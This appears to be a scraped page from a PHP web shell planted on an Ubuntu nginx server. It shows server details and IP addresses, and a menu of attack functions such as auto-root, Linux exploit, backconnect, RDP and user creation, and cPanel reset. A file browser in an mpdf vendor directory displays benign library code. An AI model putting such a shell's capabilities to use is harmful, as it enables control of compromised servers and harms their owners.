Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
vendor /
mpdf /
mpdf /
src /
Writer /
[ HOME SHELL ]
Name
Size
Permission
Action
BackgroundWriter.php
15
KB
-rw-rw-r--
BaseWriter.php
6.34
KB
-rw-rw-r--
BookmarkWriter.php
3.56
KB
-rw-rw-r--
ColorWriter.php
971
B
-rw-rw-r--
FontWriter.php
21.95
KB
-rw-rw-r--
FormWriter.php
1.39
KB
-rw-rw-r--
ImageWriter.php
3.61
KB
-rw-rw-r--
JavaScriptWriter.php
878
B
-rw-rw-r--
MetadataWriter.php
27.74
KB
-rw-rw-r--
ObjectWriter.php
1.26
KB
-rw-rw-r--
OptionalContentWriter.php
1.84
KB
-rw-rw-r--
PageWriter.php
8.42
KB
-rw-rw-r--
ResourceWriter.php
6.24
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ColorWriter.php
<?php namespace Mpdf\Writer; use Mpdf\Strict; use Mpdf\Mpdf; final class ColorWriter { use Strict; /** * @var \Mpdf\Mpdf */ private $mpdf; /** * @var \Mpdf\Writer\BaseWriter */ private $writer; public function __construct(Mpdf $mpdf, BaseWriter $writer) { $this->mpdf = $mpdf; $this->writer = $writer; } public function writeSpotColors() // _putspotcolors { foreach ($this->mpdf->spotColors as $name => $color) { $this->writer->object(); $this->writer->write('[/Separation /' . str_replace(' ', '#20', $name)); $this->writer->write('/DeviceCMYK <<'); $this->writer->write('/Range [0 1 0 1 0 1 0 1] /C0 [0 0 0 0] '); $this->writer->write(sprintf('/C1 [%.3F %.3F %.3F %.3F] ', $color['c'] / 100, $color['m'] / 100, $color['y'] / 100, $color['k'] / 100)); $this->writer->write('/FunctionType 2 /Domain [0 1] /N 1>>]'); $this->writer->write('endobj'); $this->mpdf->spotColors[$name]['n'] = $this->mpdf->n; } } }
Close